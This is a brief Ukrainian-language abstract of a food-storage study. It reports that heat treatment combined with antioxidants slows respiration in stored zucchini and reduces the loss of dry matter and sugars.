Анотація

Досліджено вплив теплової обробки антиоксидантами на інтенсивність та субстрати дихання кабачків впродовж зберігання. Встановлено, що сумісний вплив теплової обробки і антиоксидантів дозволяє гальмувати інтенсивність дихання, практично вдвічі знижує швидкість витрачання сухих речовин, на 10..12 % розчинних сахаридів, а також інгібує приріст титрованої кислотності на 43…50 %, залежно від гібриду.
